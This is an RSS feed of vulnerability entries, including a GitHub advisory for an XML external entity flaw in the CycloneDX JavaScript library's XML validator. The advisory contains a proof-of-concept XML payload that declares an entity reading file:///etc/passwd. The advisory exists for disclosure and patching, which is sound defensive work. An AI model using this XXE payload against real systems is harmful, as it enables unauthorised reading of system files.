<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 07 Oct 2026 13:09:21 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-5461</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-5461</link>
      <description>EUVD-2026-5461</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-5461</guid>
    </item>
    <item>
      <title>fkie_cve-2024-34345</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-34345</link>
      <description>&lt;p&gt;The CycloneDX JavaScript library contains the core functionality of OWASP CycloneDX for JavaScript. In 6.7.0, XML External entity injections were possible, when running the provided XML Validator on arbitrary input. This issue was fixed in version 6.7.1.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;The CycloneDX JavaScript library contains the core functionality of OWASP CycloneDX for JavaScript. In 6.7.0, XML External entity injections were possible, when running the provided XML Validator on arbitrary input. This issue was fixed in version 6.7.1.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-34345</guid>
    </item>
    <item>
      <title>GHSA-38gf-rh2w-gmj7 — @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-38gf-rh2w-gmj7</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @cyclonedx/cyclonedx-library&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.&lt;/p&gt;
&lt;p&gt;#### POC&lt;/p&gt;
&lt;p&gt;```js
const {
  Spec: { Version },
  Validation: { XmlValidator }
} = require(&amp;#39;@cyclonedx/cyclonedx-library&amp;#39;);&lt;/p&gt;
&lt;p&gt;const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;!DOCTYPE poc [
  &amp;lt;!ENTITY xxe SYSTEM &amp;#34;file:///etc/passwd&amp;#34;&amp;gt;
]&amp;gt;
&amp;lt;bom xmlns=&amp;#34;http://cyclonedx.org/schema/bom/1.5&amp;#34;&amp;gt;
  &amp;lt;components&amp;gt;
    &amp;lt;component type=&amp;#34;library&amp;#34;&amp;gt;
      &amp;lt;name&amp;gt;testing&amp;lt;/name&amp;gt;
      &amp;lt;version&amp;gt;1.337&amp;lt;/version&amp;gt;
      &amp;lt;licenses&amp;gt;
        &amp;lt;license&amp;gt;
          &amp;lt;id&amp;gt;&amp;amp;xxe;&amp;lt;/id&amp;gt;&amp;lt;!-- &amp;lt;&amp;lt; XML external entity (XXE) injection --&amp;gt;
        &amp;lt;/license&amp;gt;
      &amp;lt;/licenses&amp;gt;
    &amp;lt;/component&amp;gt;
  &amp;lt;/components&amp;gt;
&amp;lt;/bom&amp;gt;`;&lt;/p&gt;
&lt;p&gt;// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve =&amp;gt; {
  console.error(&amp;#39;validation error&amp;#39;, ve);
});
```&lt;/p&gt;
&lt;p&gt;### Patches&lt;/p&gt;
&lt;p&gt;This issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1 `.&lt;/p&gt;
&lt;p&gt;### Workarounds&lt;/p&gt;
&lt;p&gt;Do not run the provided XML validator on untrusted inputs.&lt;/p&gt;
&lt;p&gt;### References&lt;/p&gt;
&lt;p&gt;* issue was introduced via &amp;lt;https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063&amp;gt;.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @cyclonedx/cyclonedx-library&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.&lt;/p&gt;
&lt;p&gt;#### POC&lt;/p&gt;
&lt;p&gt;```js
const {
  Spec: { Version },
  Validation: { XmlValidator }
} = require(&amp;#39;@cyclonedx/cyclonedx-library&amp;#39;);&lt;/p&gt;
&lt;p&gt;const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;!DOCTYPE poc [
  &amp;lt;!ENTITY xxe SYSTEM &amp;#34;file:///etc/passwd&amp;#34;&amp;gt;
]&amp;gt;
&amp;lt;bom xmlns=&amp;#34;http://cyclonedx.org/schema/bom/1.5&amp;#34;&amp;gt;
  &amp;lt;components&amp;gt;
    &amp;lt;component type=&amp;#34;library&amp;#34;&amp;gt;
      &amp;lt;name&amp;gt;testing&amp;lt;/name&amp;gt;
      &amp;lt;version&amp;gt;1.337&amp;lt;/version&amp;gt;
      &amp;lt;licenses&amp;gt;
        &amp;lt;license&amp;gt;
          &amp;lt;id&amp;gt;&amp;amp;xxe;&amp;lt;/id&amp;gt;&amp;lt;!-- &amp;lt;&amp;lt; XML external entity (XXE) injection --&amp;gt;
        &amp;lt;/license&amp;gt;
      &amp;lt;/licenses&amp;gt;
    &amp;lt;/component&amp;gt;
  &amp;lt;/components&amp;gt;
&amp;lt;/bom&amp;gt;`;&lt;/p&gt;
&lt;p&gt;// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve =&amp;gt; {
  console.error(&amp;#39;validation error&amp;#39;, ve);
});
```&lt;/p&gt;
&lt;p&gt;### Patches&lt;/p&gt;
&lt;p&gt;This issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1 `.&lt;/p&gt;
&lt;p&gt;### Workarounds&lt;/p&gt;
&lt;p&gt;Do not run the provided XML validator on untrusted inputs.&lt;/p&gt;
&lt;p&gt;### References&lt;/p&gt;
&lt;p&gt;* issue was introduced via &amp;lt;https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063&amp;gt;.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-38gf-rh2w-gmj7</guid>
    </item>
  </channel>
</rss>
